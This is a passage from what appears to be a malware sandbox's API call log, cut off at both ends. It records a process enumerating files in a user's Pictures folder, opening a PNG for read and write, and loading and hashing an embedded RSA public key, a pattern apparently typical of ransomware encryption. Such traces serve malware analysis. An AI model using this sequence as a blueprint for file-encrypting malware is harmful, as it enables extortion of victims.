dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.125] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.127] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.138] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\") returned="d7pQIdSiE6laiAyeoE\\" [0193.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0193.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0193.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.139] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0193.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41e30 [0193.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.139] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0193.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41e30 | out: hHeap=0x6a0000) returned 1 [0193.139] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0193.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.140] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0193.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.140] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0193.140] PathFindFileNameW (pszPath="") returned="" [0193.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.140] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43afb100, ftCreationTime.dwHighDateTime=0x1d8a284, ftLastAccessTime.dwLowDateTime=0x3af16be0, ftLastAccessTime.dwHighDateTime=0x1d8a5df, ftLastWriteTime.dwLowDateTime=0x3af16be0, ftLastWriteTime.dwHighDateTime=0x1d8a5df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0193.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.145] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43afb100, ftCreationTime.dwHighDateTime=0x1d8a284, ftLastAccessTime.dwLowDateTime=0x3af16be0, ftLastAccessTime.dwHighDateTime=0x1d8a5df, ftLastWriteTime.dwLowDateTime=0x3af16be0, ftLastWriteTime.dwHighDateTime=0x1d8a5df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0193.145] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda6b0590, ftCreationTime.dwHighDateTime=0x1d89906, ftLastAccessTime.dwLowDateTime=0xd35dc990, ftLastAccessTime.dwHighDateTime=0x1d89f87, ftLastWriteTime.dwLowDateTime=0xd35dc990, ftLastWriteTime.dwHighDateTime=0x1d89f87, nFileSizeHigh=0x0, nFileSizeLow=0x12bac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cH1Zz4OF5OqujiOEN9.png", cAlternateFileName="CH1ZZ4~1.PNG")) returned 1 [0193.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.145] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\cH1Zz4OF5OqujiOEN9.png") returned=".png" [0193.145] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\cH1Zz4OF5OqujiOEN9.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\ch1zz4of5oqujioen9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.146] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=76716) returned 1 [0193.146] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.149] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x12b86, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.149] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.151] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.151] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x12bac, lpOverlapped=0x0) returned 1 [0193.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.153] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.153] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0193.154] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0193.154] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.154] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0193.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0193.154] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0193.154] GetLastError () returned 0x0 [0193.154] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0193.154] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0193.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0193.155] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0193.155] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0193.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.155] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0193.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x12bb0) returned 0x2d47778 [0193.156] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41e30 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e08 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d41e78 [0193.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e20 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e50 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.157] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e68 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e50 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.160] GetCurrentThreadId () returned 0x264 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d458b0 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.161] GetCurrentThreadId () returned 0x264 [0193.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.162] HeapFree 